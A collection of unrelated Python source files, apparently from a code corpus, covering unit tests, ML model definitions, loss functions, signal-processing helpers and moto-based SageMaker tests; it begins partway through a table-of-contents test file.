'100': [
{'title': 'Subpart A', 'index': ['100', 'Subpart', 'A']},
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}],
'100-Subpart-A': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Sec2', 'index': ['100', '2']},
{'title': '100.3 Sec3', 'index': ['100', '3']}]
})
_, result = toc.apply_layer('100')
self.assertEqual(3, len(result))
self.assertEqual(3, len(result[0]['sub_toc']))
def test_apply_layer_first_appendix(self):
toc = TableOfContentsLayer({'100': [
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Appendix B', 'index': ['100', 'B']},
{'title': 'Appendix C', 'index': ['100', 'C']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(4, len(result))
aA, aB, aC, sI = result
self.assertTrue(aA['is_first_appendix'])
self.assertFalse(aB['is_first_appendix'])
self.assertFalse(aC['is_first_appendix'])
self.assertFalse(sI.get('is_first_appendix', False))
toc = TableOfContentsLayer({'100': [
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(1, len(result))
self.assertFalse(result[0].get('is_first_appendix', False))
def test_apply_layer_interp_emptysubpart(self):
toc = TableOfContentsLayer({'100': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Second', 'index': ['100', '2']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(3, len(result))
s1, s2, interp = result
self.assertEqual(1, len(interp['sub_toc']))
nosubpart = interp['sub_toc'][0]
self.assertEqual('Regulation Text', nosubpart['label'])
self.assertEqual(['100', 'Subpart', 'Interp'], nosubpart['index'])
toc = TableOfContentsLayer({'100': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Second', 'index': ['100', '2']},
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Appendix C', 'index': ['100', 'C']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(5, len(result))
s1, s2, appA, appC, interp = result
self.assertEqual(2, len(interp['sub_toc']))
nosubpart, appendices = interp['sub_toc']
self.assertEqual('Regulation Text', nosubpart['label'])
self.assertEqual(['100', 'Subpart', 'Interp'], nosubpart['index'])
self.assertEqual('Appendices', appendices['label'])
self.assertEqual(['100', 'Appendices', 'Interp'], appendices['index'])
def test_apply_layer_interp_subparts(self):
toc = TableOfContentsLayer({
'100': [
{'title': 'Subpart A', 'index': ['100', 'Subpart', 'A']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}],
'100-Subpart-A': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Second', 'index': ['100', '2']}]})
_, result = toc.apply_layer('100')
self.assertEqual(2, len(result))
subpartA, interp = result
self.assertEqual(2, len(subpartA['sub_toc']))
self.assertEqual(1, len(interp['sub_toc']))
nosubpart = interp['sub_toc'][0]
self.assertEqual('Subpart A', nosubpart['label'])
self.assertEqual(['100', 'Subpart', 'A', 'Interp'], nosubpart['index'])
toc = TableOfContentsLayer({
'100': [
{'title': 'Subpart A', 'index': ['100', 'Subpart', 'A']},
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Appendix C', 'index': ['100', 'C']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}],
'100-Subpart-A': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Second', 'index': ['100', '2']}]})
_, result = toc.apply_layer('100')
self.assertEqual(4, len(result))
subpartA, appA, appC, interp = result
self.assertEqual(2, len(interp['sub_toc']))
nosubpart, appendices = interp['sub_toc']
self.assertEqual('Subpart A', nosubpart['label'])
self.assertEqual(['100', 'Subpart', 'A', 'Interp'], nosubpart['index'])
self.assertEqual('Appendices', appendices['label'])
self.assertEqual(['100', 'Appendices', 'Interp'], appendices['index'])
|
22741
|
import sys
sys.path.insert(1,"../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gbm import H2OGradientBoostingEstimator
from h2o.utils.model_utils import reset_model_threshold
def test_reset_threshold():
"""
Test the model threshold can be reset.
Performance metric should be recalculated and also predictions should be changed based on the new threshold.
"""
# import data
airlines = h2o.import_file(path=pyunit_utils.locate("smalldata/airlines/modified_airlines.csv"))
# convert columns to factors
airlines["Year"] = airlines["Year"].asfactor()
airlines["Month"] = airlines["Month"].asfactor()
airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
airlines["Cancelled"] = airlines["Cancelled"].asfactor()
airlines['FlightNum'] = airlines['FlightNum'].asfactor()
# set the predictor names and the response column name
predictors = ["Origin", "Dest", "Year", "UniqueCarrier", "DayOfWeek", "Month", "Distance", "FlightNum"]
response = "IsDepDelayed"
# split into train and validation sets
train, valid = airlines.split_frame(ratios = [.8], seed = 1234)
# initialize the estimator
model = H2OGradientBoostingEstimator(seed = 1234, ntrees=5)
# train the model
model.train(x=predictors, y=response, training_frame=train)
old_threshold = model._model_json['output']['default_threshold']
# predict
preds = model.predict(airlines)
# reset the threshold and get the old one
new_threshold = 0.6917189903082518
old_returned = reset_model_threshold(model, new_threshold)
reset_model = h2o.get_model(model.model_id)
reset_threshold = reset_model._model_json['output']['default_threshold']
# predict with reset model
preds_reset = reset_model.predict(airlines)
# compare thresholds
assert old_threshold == old_returned
assert new_threshold == reset_threshold
assert reset_threshold != old_threshold
# compare predictions
preds_local = preds.as_data_frame()
preds_reset_local = preds_reset.as_data_frame()
print("old threshold:", old_threshold, "new_threshold:", new_threshold)
for i in range(airlines.nrow):
if old_threshold <= preds_local.iloc[i, 2] < new_threshold:
assert preds_local.iloc[i, 0] != preds_reset_local.iloc[i, 0]
else:
assert preds_local.iloc[i, 0] == preds_reset_local.iloc[i, 0]
if __name__ == "__main__":
pyunit_utils.standalone_test(test_reset_threshold)
else:
test_reset_threshold()
|
22758
|
import pytest
import sqlalchemy as sa
class ThreeLevelDeepOneToOne(object):
@pytest.fixture
def Catalog(self, Base, Category):
class Catalog(Base):
__tablename__ = 'catalog'
id = sa.Column('_id', sa.Integer, primary_key=True)
category = sa.orm.relationship(
Category,
uselist=False,
backref='catalog'
)
return Catalog
@pytest.fixture
def Category(self, Base, SubCategory):
class Category(Base):
__tablename__ = 'category'
id = sa.Column('_id', sa.Integer, primary_key=True)
catalog_id = sa.Column(
'_catalog_id',
sa.Integer,
sa.ForeignKey('catalog._id')
)
sub_category = sa.orm.relationship(
SubCategory,
uselist=False,
backref='category'
)
return Category
@pytest.fixture
def SubCategory(self, Base, Product):
class SubCategory(Base):
__tablename__ = 'sub_category'
id = sa.Column('_id', sa.Integer, primary_key=True)
category_id = sa.Column(
'_category_id',
sa.Integer,
sa.ForeignKey('category._id')
)
product = sa.orm.relationship(
Product,
uselist=False,
backref='sub_category'
)
return SubCategory
@pytest.fixture
def Product(self, Base):
class Product(Base):
__tablename__ = 'product'
id = sa.Column('_id', sa.Integer, primary_key=True)
price = sa.Column(sa.Integer)
sub_category_id = sa.Column(
'_sub_category_id',
sa.Integer,
sa.ForeignKey('sub_category._id')
)
return Product
@pytest.fixture
def init_models(self, Catalog, Category, SubCategory, Product):
pass
class ThreeLevelDeepOneToMany(object):
@pytest.fixture
def Catalog(self, Base, Category):
class Catalog(Base):
__tablename__ = 'catalog'
id = sa.Column('_id', sa.Integer, primary_key=True)
categories = sa.orm.relationship(Category, backref='catalog')
return Catalog
@pytest.fixture
def Category(self, Base, SubCategory):
class Category(Base):
__tablename__ = 'category'
id = sa.Column('_id', sa.Integer, primary_key=True)
catalog_id = sa.Column(
'_catalog_id',
sa.Integer,
sa.ForeignKey('catalog._id')
)
sub_categories = sa.orm.relationship(
SubCategory, backref='category'
)
return Category
@pytest.fixture
def SubCategory(self, Base, Product):
class SubCategory(Base):
__tablename__ = 'sub_category'
id = sa.Column('_id', sa.Integer, primary_key=True)
category_id = sa.Column(
'_category_id',
sa.Integer,
sa.ForeignKey('category._id')
)
products = sa.orm.relationship(
Product,
backref='sub_category'
)
return SubCategory
@pytest.fixture
def Product(self, Base):
class Product(Base):
__tablename__ = 'product'
id = sa.Column('_id', sa.Integer, primary_key=True)
price = sa.Column(sa.Numeric)
sub_category_id = sa.Column(
'_sub_category_id',
sa.Integer,
sa.ForeignKey('sub_category._id')
)
def __repr__(self):
return '<Product id=%r>' % self.id
return Product
@pytest.fixture
def init_models(self, Catalog, Category, SubCategory, Product):
pass
class ThreeLevelDeepManyToMany(object):
@pytest.fixture
def Catalog(self, Base, Category):
catalog_category = sa.Table(
'catalog_category',
Base.metadata,
sa.Column('catalog_id', sa.Integer, sa.ForeignKey('catalog._id')),
sa.Column('category_id', sa.Integer, sa.ForeignKey('category._id'))
)
class Catalog(Base):
__tablename__ = 'catalog'
id = sa.Column('_id', sa.Integer, primary_key=True)
categories = sa.orm.relationship(
Category,
backref='catalogs',
secondary=catalog_category
)
return Catalog
@pytest.fixture
def Category(self, Base, SubCategory):
category_subcategory = sa.Table(
'category_subcategory',
Base.metadata,
sa.Column(
'category_id',
sa.Integer,
sa.ForeignKey('category._id')
),
sa.Column(
'subcategory_id',
sa.Integer,
sa.ForeignKey('sub_category._id')
)
)
class Category(Base):
__tablename__ = 'category'
id = sa.Column('_id', sa.Integer, primary_key=True)
sub_categories = sa.orm.relationship(
SubCategory,
backref='categories',
secondary=category_subcategory
)
return Category
@pytest.fixture
def SubCategory(self, Base, Product):
subcategory_product = sa.Table(
'subcategory_product',
Base.metadata,
sa.Column(
'subcategory_id',
sa.Integer,
sa.ForeignKey('sub_category._id')
),
sa.Column(
'product_id',
sa.Integer,
sa.ForeignKey('product._id')
)
)
class SubCategory(Base):
__tablename__ = 'sub_category'
id = sa.Column('_id', sa.Integer, primary_key=True)
products = sa.orm.relationship(
Product,
backref='sub_categories',
secondary=subcategory_product
)
return SubCategory
@pytest.fixture
def Product(self, Base):
class Product(Base):
__tablename__ = 'product'
id = sa.Column('_id', sa.Integer, primary_key=True)
price = sa.Column(sa.Numeric)
return Product
@pytest.fixture
def init_models(self, Catalog, Category, SubCategory, Product):
pass
|
22777
|
from triage.experiments import ExperimentBase
class SingleThreadedExperiment(ExperimentBase):
def process_query_tasks(self, query_tasks):
self.feature_generator.process_table_tasks(query_tasks)
def process_matrix_build_tasks(self, matrix_build_tasks):
self.matrix_builder.build_all_matrices(matrix_build_tasks)
def process_train_test_batches(self, batches):
self.model_train_tester.process_all_batches(batches)
def process_subset_tasks(self, subset_tasks):
self.subsetter.process_all_tasks(subset_tasks)
|
22799
|
from .backend import Backend
from .circuitbyqiskit import CircuitByQiskit
from .circuitbyprojectq import CircuitByProjectq
from .circuitbycirq import CircuitByCirq
from .circuitbyqulacs import CircuitByQulacs
# from .circuitbytket import CircuitByTket
from .circuitbytensor import CircuitByTensor
from .circuitbyqton import CircuitByQton
import warnings
warnings.filterwarnings("ignore")
__all__ = [
'Backend',
'CircuitByCirq',
'CircuitByQiskit',
'CircuitByProjectq',
'CircuitByTensor',
'CircuitByQulacs',
'CircuitByQton'
]
|
22855
|
import os
import pygame
import random
trigger = False
x = 0
y = 0
height = 720
width = 1280
linelength = 50
lineAmt = 20
displace = 10
xpos = [random.randrange(-200,1280) for i in range(0, lineAmt + 2)]
xpos1 = [(xpos[i]+displace) for i in range(0, lineAmt + 2)]
xr = 360
yr = 240
def setup(screen, etc):
global trigger, x, y, height, width, xpos, lineAmt, xpos1, linelength, displace, xr, yr
xr = etc.xres
yr = etc.yres
height = yr
width = xr
    linelength = int((50*xr)/1280)
    lineAmt = int((20*xr)/1280)
    displace = int((10*xr)/1280)
xpos = [random.randrange(int((-200*xr)/1280),xr) for i in range(0, lineAmt + 2)]
xpos1 = [(xpos[i]+displace) for i in range(0, lineAmt + 2)]
pass
def draw(screen, etc):
global trigger, x, y, height, width, xpos, lineAmt, xpos1, linelength, displace, xr, yr
etc.color_picker_bg(etc.knob5)
    displace = int((10*xr)/1280)
    linewidth = int(height / lineAmt)
linelength = int(etc.knob2*((300*xr)/1280)+1)
color = etc.color_picker(etc.knob4)
minus = (etc.knob3*0.5)+0.5
shadowColor = (etc.bg_color[0]*minus, etc.bg_color[1]*minus, etc.bg_color[2]*minus)
if etc.audio_trig or etc.midi_note_new :
trigger = True
if trigger == True :
lineAmt = int(etc.knob1*((100*yr)/720) + 2)
xpos = [random.randrange(int((-200*xr)/1280),xr) for i in range(0, lineAmt + 2)]
xpos1 = [(xpos[i]+displace) for i in range(0, lineAmt + 2)]
for k in range(0, lineAmt + 2) :
x = xpos1[k] + linelength
y = (k * linewidth) + int(linewidth/2)- 1
pygame.draw.line(screen, shadowColor, (xpos1[k], y+displace), (x, y+displace), linewidth)
for j in range(0, lineAmt + 2) :
x = xpos[j] + linelength
y = (j * linewidth) + int(linewidth/2)- 1
pygame.draw.line(screen, color, (xpos[j], y), (x, y), linewidth)
trigger = False
|
22869
|
import tensorflow as tf
from tensorflow.contrib import slim
def head(endpoints, embedding_dim, is_training, weights_regularizer=None):
predict_var = 0
input = endpoints['model_output']
endpoints['head_output'] = slim.fully_connected(
input, 1024, normalizer_fn=slim.batch_norm,
normalizer_params={
'decay': 0.9,
'epsilon': 1e-5,
'scale': True,
'is_training': is_training,
'updates_collections': tf.GraphKeys.UPDATE_OPS,
},
weights_regularizer=weights_regularizer
)
input_1 = endpoints['head_output']
endpoints['emb_raw'] = slim.fully_connected(
input_1, embedding_dim + predict_var, activation_fn=None,weights_regularizer=weights_regularizer,
weights_initializer=tf.orthogonal_initializer(), scope='emb')
endpoints['emb'] = tf.nn.l2_normalize(endpoints['emb_raw'], -1)
# endpoints['data_sigma'] = None
print('Normalize batch embedding')
return endpoints
|
22870
|
from topbeat import BaseTest
import os
import shutil
import time
"""
Contains tests for base config
"""
class Test(BaseTest):
def test_invalid_config(self):
"""
Checks stop when input and topbeat defined
"""
shutil.copy("./config/topbeat-input-invalid.yml",
os.path.join(self.working_dir, "invalid.yml"))
exit_code = self.run_beat(config="invalid.yml", extra_args=["-N"])
assert exit_code == 1
assert self.log_contains(
"'topbeat' and 'input' are both set in config.") is True
def test_old_config(self):
"""
Test that old config still works with deprecation warning
"""
shutil.copy("./config/topbeat-old.yml",
os.path.join(self.working_dir, "topbeat-old.yml"))
topbeat = self.start_beat(config="topbeat-old.yml", extra_args=["-N"])
time.sleep(1)
topbeat.check_kill_and_wait()
assert self.log_contains(
"Using 'input' in configuration is deprecated and is scheduled to "
"be removed in Topbeat 6.0. Use 'topbeat' instead.") is True
|
22909
|
from __future__ import division
import numpy as np
__all__ = ['subtract_CAR',
'subtract_common_median_reference']
def subtract_CAR(X, b_size=16):
"""
Compute and subtract common average reference in 16 channel blocks.
"""
channels, time_points = X.shape
s = channels // b_size
r = channels % b_size
X_1 = X[:channels-r].copy()
X_1 = X_1.reshape((s, b_size, time_points))
X_1 -= np.nanmean(X_1, axis=1, keepdims=True)
if r > 0:
X_2 = X[channels-r:].copy()
X_2 -= np.nanmean(X_2, axis=0, keepdims=True)
X = np.vstack([X_1.reshape((s*b_size, time_points)), X_2])
return X
else:
return X_1.reshape((s*b_size, time_points))
def subtract_common_median_reference(X, channel_axis=-2):
"""
Compute and subtract common median reference
for the entire grid.
Parameters
----------
X : ndarray (..., n_channels, n_time)
Data to common median reference.
Returns
-------
Xp : ndarray (..., n_channels, n_time)
Common median referenced data.
"""
median = np.nanmedian(X, axis=channel_axis, keepdims=True)
Xp = X - median
return Xp
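# Illustrative usage sketch; the array sizes below are arbitrary:
#
# X = np.random.randn(64, 1000)              # 64 channels, 1000 time points
# X_car = subtract_CAR(X, b_size=16)         # re-referenced in 16-channel blocks
# X_cmr = subtract_common_median_reference(X)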
|
22916
|
from oauthlib.oauth2 import InvalidClientError, MissingTokenError
import pytest
from test import configure_mendeley, cassette
def test_should_get_authenticated_session():
mendeley = configure_mendeley()
auth = mendeley.start_client_credentials_flow()
with cassette('fixtures/auth/client_credentials/get_authenticated_session.yaml'):
session = auth.authenticate()
assert session.token['access_token']
assert session.host == 'https://api.mendeley.com'
def test_should_throw_exception_on_incorrect_credentials():
mendeley = configure_mendeley()
mendeley.client_secret += '-invalid'
auth = mendeley.start_client_credentials_flow()
# We should never get an access token back
# and the OAuth library should be unhappy about that
with cassette('fixtures/auth/client_credentials/incorrect_credentials.yaml'), pytest.raises(MissingTokenError):
auth.authenticate()
|
22973
|
import tensorflow as tf
"""Class for KDD10 percent GAN architecture.
Generator and discriminator.
"""
learning_rate = 0.00001
batch_size = 50
layer = 1
latent_dim = 32
dis_inter_layer_dim = 128
init_kernel = tf.contrib.layers.xavier_initializer()
def generator(z_inp, is_training=False, getter=None, reuse=False):
""" Generator architecture in tensorflow
Generates data from the latent space
Args:
z_inp (tensor): variable in the latent space
reuse (bool): sharing variables or not
Returns:
(tensor): last activation layer of the generator
"""
with tf.variable_scope('generator', reuse=reuse, custom_getter=getter):
name_net = 'layer_1'
with tf.variable_scope(name_net):
net = tf.layers.dense(z_inp,
units=64,
kernel_initializer=init_kernel,
name='fc')
net = tf.nn.relu(net, name='relu')
name_net = 'layer_2'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=128,
kernel_initializer=init_kernel,
name='fc')
net = tf.nn.relu(net, name='relu')
name_net = 'layer_4'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=121,
kernel_initializer=init_kernel,
name='fc')
return net
def discriminator(x_inp, is_training=False, getter=None, reuse=False):
""" Discriminator architecture in tensorflow
Discriminates between real data and generated data
Args:
x_inp (tensor): input data for the encoder.
reuse (bool): sharing variables or not
Returns:
logits (tensor): last activation layer of the discriminator (shape 1)
intermediate_layer (tensor): intermediate layer for feature matching
"""
with tf.variable_scope('discriminator', reuse=reuse, custom_getter=getter):
name_net = 'layer_1'
with tf.variable_scope(name_net):
net = tf.layers.dense(x_inp,
units=256,
kernel_initializer=init_kernel,
name='fc')
net = leakyReLu(net)
net = tf.layers.dropout(net, rate=0.2, name='dropout',
training=is_training)
name_net = 'layer_2'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=128,
kernel_initializer=init_kernel,
name='fc')
net = leakyReLu(net)
net = tf.layers.dropout(net, rate=0.2, name='dropout',
training=is_training)
name_net = 'layer_3'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=dis_inter_layer_dim,
kernel_initializer=init_kernel,
name='fc')
net = leakyReLu(net)
net = tf.layers.dropout(net,
rate=0.2,
name='dropout',
training=is_training)
intermediate_layer = net
name_net = 'layer_4'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=1,
kernel_initializer=init_kernel,
name='fc')
net = tf.squeeze(net)
return net, intermediate_layer
def leakyReLu(x, alpha=0.1, name=None):
if name:
with tf.variable_scope(name):
return _leakyReLu_impl(x, alpha)
else:
return _leakyReLu_impl(x, alpha)
def _leakyReLu_impl(x, alpha):
return tf.nn.relu(x) - (alpha * tf.nn.relu(-x))
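# --- Minimal wiring sketch (added for illustration; assumes TensorFlow 1.x
# --- graph mode and the 121-dimensional KDD feature vectors used above). ---
if __name__ == '__main__':
    z_pl = tf.placeholder(tf.float32, shape=[None, latent_dim], name='z')
    x_pl = tf.placeholder(tf.float32, shape=[None, 121], name='x')
    x_gen = generator(z_pl, is_training=True)
    logits_real, feats_real = discriminator(x_pl, is_training=True)
    # Reuse the discriminator variables for the generated samples.
    logits_fake, feats_fake = discriminator(x_gen, is_training=True, reuse=True)
    print(x_gen.shape, logits_real.shape, feats_real.shape)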
|
23001
|
import math
import torch
import torch.nn as nn
from torch.nn import functional as F
class KLRegression(nn.Module):
"""KL-divergence loss for probabilistic regression.
It is computed using Monte Carlo (MC) samples from an arbitrary distribution."""
def __init__(self, eps=0.0):
super().__init__()
self.eps = eps
def forward(self, scores, sample_density, gt_density, mc_dim=-1):
"""Args:
scores: predicted score values
sample_density: probability density of the sample distribution
gt_density: probability density of the ground truth distribution
mc_dim: dimension of the MC samples"""
exp_val = scores - torch.log(sample_density + self.eps)
L = torch.logsumexp(exp_val, dim=mc_dim) - math.log(scores.shape[mc_dim]) - \
torch.mean(scores * (gt_density / (sample_density + self.eps)), dim=mc_dim)
return L.mean()
class MLRegression(nn.Module):
"""Maximum likelihood loss for probabilistic regression.
It is computed using Monte Carlo (MC) samples from an arbitrary distribution."""
def __init__(self, eps=0.0):
super().__init__()
self.eps = eps
def forward(self, scores, sample_density, gt_density=None, mc_dim=-1):
"""Args:
scores: predicted score values. First sample must be ground-truth
sample_density: probability density of the sample distribution
gt_density: not used
mc_dim: dimension of the MC samples. Only mc_dim=1 supported"""
assert mc_dim == 1
assert (sample_density[:,0,...] == -1).all()
exp_val = scores[:, 1:, ...] - torch.log(sample_density[:, 1:, ...] + self.eps)
L = torch.logsumexp(exp_val, dim=mc_dim) - math.log(scores.shape[mc_dim] - 1) - scores[:, 0, ...]
loss = L.mean()
return loss
class KLRegressionGrid(nn.Module):
"""KL-divergence loss for probabilistic regression.
It is computed using the grid integration strategy."""
def forward(self, scores, gt_density, grid_dim=-1, grid_scale=1.0):
"""Args:
scores: predicted score values
gt_density: probability density of the ground truth distribution
grid_dim: dimension(s) of the grid
grid_scale: area of one grid cell"""
score_corr = grid_scale * torch.sum(scores * gt_density, dim=grid_dim)
L = torch.logsumexp(scores, dim=grid_dim) + math.log(grid_scale) - score_corr
return L.mean()
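# --- Minimal usage sketch (added for illustration; the random tensors below
# --- stand in for real predicted scores and densities). ---
if __name__ == '__main__':
    torch.manual_seed(0)
    scores = torch.randn(4, 128)                 # batch of 4, 128 MC samples
    sample_density = torch.rand(4, 128) + 0.1    # strictly positive densities
    gt_density = torch.rand(4, 128)
    kl_loss = KLRegression()(scores, sample_density, gt_density, mc_dim=-1)
    # MLRegression expects the first MC sample to lie on the ground truth,
    # flagged by a sample density of -1 in that slot.
    ml_density = sample_density.clone()
    ml_density[:, 0] = -1
    ml_loss = MLRegression()(scores, ml_density, mc_dim=1)
    grid_loss = KLRegressionGrid()(scores, gt_density, grid_dim=-1, grid_scale=0.5)
    print(kl_loss.item(), ml_loss.item(), grid_loss.item())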
|
23047
|
import boto3
from botocore.exceptions import ClientError
import datetime
import pytest
import sure  # noqa: F401 -- enables the fluent `.should` assertions used below
from moto import mock_sagemaker
from moto.sts.models import ACCOUNT_ID
FAKE_ROLE_ARN = "arn:aws:iam::{}:role/FakeRole".format(ACCOUNT_ID)
TEST_REGION_NAME = "us-east-1"
class MyProcessingJobModel(object):
def __init__(
self,
processing_job_name,
role_arn,
container=None,
bucket=None,
prefix=None,
app_specification=None,
network_config=None,
processing_inputs=None,
processing_output_config=None,
processing_resources=None,
stopping_condition=None,
):
self.processing_job_name = processing_job_name
self.role_arn = role_arn
self.container = (
container
or "683313688378.dkr.ecr.us-east-1.amazonaws.com/sagemaker-scikit-learn:0.23-1-cpu-py3"
)
self.bucket = bucket or "my-bucket"
self.prefix = prefix or "sagemaker"
self.app_specification = app_specification or {
"ImageUri": self.container,
"ContainerEntrypoint": ["python3",],
}
self.network_config = network_config or {
"EnableInterContainerTrafficEncryption": False,
"EnableNetworkIsolation": False,
}
self.processing_inputs = processing_inputs or [
{
"InputName": "input",
"AppManaged": False,
"S3Input": {
"S3Uri": "s3://{}/{}/processing/".format(self.bucket, self.prefix),
"LocalPath": "/opt/ml/processing/input",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
}
]
self.processing_output_config = processing_output_config or {
"Outputs": [
{
"OutputName": "output",
"S3Output": {
"S3Uri": "s3://{}/{}/processing/".format(
self.bucket, self.prefix
),
"LocalPath": "/opt/ml/processing/output",
"S3UploadMode": "EndOfJob",
},
"AppManaged": False,
}
]
}
self.processing_resources = processing_resources or {
"ClusterConfig": {
"InstanceCount": 1,
"InstanceType": "ml.m5.large",
"VolumeSizeInGB": 10,
},
}
self.stopping_condition = stopping_condition or {
"MaxRuntimeInSeconds": 3600,
}
def save(self):
sagemaker = boto3.client("sagemaker", region_name=TEST_REGION_NAME)
params = {
"AppSpecification": self.app_specification,
"NetworkConfig": self.network_config,
"ProcessingInputs": self.processing_inputs,
"ProcessingJobName": self.processing_job_name,
"ProcessingOutputConfig": self.processing_output_config,
"ProcessingResources": self.processing_resources,
"RoleArn": self.role_arn,
"StoppingCondition": self.stopping_condition,
}
return sagemaker.create_processing_job(**params)
@mock_sagemaker
def test_create_processing_job():
sagemaker = boto3.client("sagemaker", region_name=TEST_REGION_NAME)
processing_job_name = "MyProcessingJob"
role_arn = "arn:aws:iam::{}:role/FakeRole".format(ACCOUNT_ID)
container = "382416733822.dkr.ecr.us-east-1.amazonaws.com/linear-learner:1"
bucket = "my-bucket"
prefix = "my-prefix"
app_specification = {
"ImageUri": container,
"ContainerEntrypoint": ["python3", "app.py"],
}
processing_resources = {
"ClusterConfig": {
"InstanceCount": 2,
"InstanceType": "ml.m5.xlarge",
"VolumeSizeInGB": 20,
},
}
stopping_condition = {"MaxRuntimeInSeconds": 60 * 60}
job = MyProcessingJobModel(
processing_job_name,
role_arn,
container=container,
bucket=bucket,
prefix=prefix,
app_specification=app_specification,
processing_resources=processing_resources,
stopping_condition=stopping_condition,
)
resp = job.save()
resp["ProcessingJobArn"].should.match(
r"^arn:aws:sagemaker:.*:.*:processing-job/{}$".format(processing_job_name)
)
resp = sagemaker.describe_processing_job(ProcessingJobName=processing_job_name)
resp["ProcessingJobName"].should.equal(processing_job_name)
resp["ProcessingJobArn"].should.match(
r"^arn:aws:sagemaker:.*:.*:processing-job/{}$".format(processing_job_name)
)
assert "python3" in resp["AppSpecification"]["ContainerEntrypoint"]
assert "app.py" in resp["AppSpecification"]["ContainerEntrypoint"]
assert resp["RoleArn"] == role_arn
assert resp["ProcessingJobStatus"] == "Completed"
assert isinstance(resp["CreationTime"], datetime.datetime)
assert isinstance(resp["LastModifiedTime"], datetime.datetime)
@mock_sagemaker
def test_list_processing_jobs():
client = boto3.client("sagemaker", region_name="us-east-1")
name = "blah"
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar"
test_processing_job = MyProcessingJobModel(processing_job_name=name, role_arn=arn)
test_processing_job.save()
processing_jobs = client.list_processing_jobs()
assert len(processing_jobs["ProcessingJobSummaries"]).should.equal(1)
assert processing_jobs["ProcessingJobSummaries"][0][
"ProcessingJobName"
].should.equal(name)
assert processing_jobs["ProcessingJobSummaries"][0][
"ProcessingJobArn"
].should.match(r"^arn:aws:sagemaker:.*:.*:processing-job/{}$".format(name))
assert processing_jobs.get("NextToken") is None
@mock_sagemaker
def test_list_processing_jobs_multiple():
client = boto3.client("sagemaker", region_name="us-east-1")
name_job_1 = "blah"
arn_job_1 = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar"
test_processing_job_1 = MyProcessingJobModel(
processing_job_name=name_job_1, role_arn=arn_job_1
)
test_processing_job_1.save()
name_job_2 = "blah2"
arn_job_2 = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar2"
test_processing_job_2 = MyProcessingJobModel(
processing_job_name=name_job_2, role_arn=arn_job_2
)
test_processing_job_2.save()
processing_jobs_limit = client.list_processing_jobs(MaxResults=1)
assert len(processing_jobs_limit["ProcessingJobSummaries"]).should.equal(1)
processing_jobs = client.list_processing_jobs()
assert len(processing_jobs["ProcessingJobSummaries"]).should.equal(2)
assert processing_jobs.get("NextToken").should.be.none
@mock_sagemaker
def test_list_processing_jobs_none():
client = boto3.client("sagemaker", region_name="us-east-1")
processing_jobs = client.list_processing_jobs()
assert len(processing_jobs["ProcessingJobSummaries"]).should.equal(0)
@mock_sagemaker
def test_list_processing_jobs_should_validate_input():
client = boto3.client("sagemaker", region_name="us-east-1")
junk_status_equals = "blah"
with pytest.raises(ClientError) as ex:
client.list_processing_jobs(StatusEquals=junk_status_equals)
expected_error = f"1 validation errors detected: Value '{junk_status_equals}' at 'statusEquals' failed to satisfy constraint: Member must satisfy enum value set: ['Completed', 'Stopped', 'InProgress', 'Stopping', 'Failed']"
assert ex.value.response["Error"]["Code"] == "ValidationException"
assert ex.value.response["Error"]["Message"] == expected_error
junk_next_token = "<PASSWORD>"
with pytest.raises(ClientError) as ex:
client.list_processing_jobs(NextToken=junk_next_token)
assert ex.value.response["Error"]["Code"] == "ValidationException"
assert (
ex.value.response["Error"]["Message"]
== 'Invalid pagination token because "{0}".'
)
@mock_sagemaker
def test_list_processing_jobs_with_name_filters():
client = boto3.client("sagemaker", region_name="us-east-1")
for i in range(5):
name = "xgboost-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
for i in range(5):
name = "vgg-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/barfoo-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
xgboost_processing_jobs = client.list_processing_jobs(NameContains="xgboost")
assert len(xgboost_processing_jobs["ProcessingJobSummaries"]).should.equal(5)
processing_jobs_with_2 = client.list_processing_jobs(NameContains="2")
assert len(processing_jobs_with_2["ProcessingJobSummaries"]).should.equal(2)
@mock_sagemaker
def test_list_processing_jobs_paginated():
client = boto3.client("sagemaker", region_name="us-east-1")
for i in range(5):
name = "xgboost-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
xgboost_processing_job_1 = client.list_processing_jobs(
NameContains="xgboost", MaxResults=1
)
assert len(xgboost_processing_job_1["ProcessingJobSummaries"]).should.equal(1)
assert xgboost_processing_job_1["ProcessingJobSummaries"][0][
"ProcessingJobName"
].should.equal("xgboost-0")
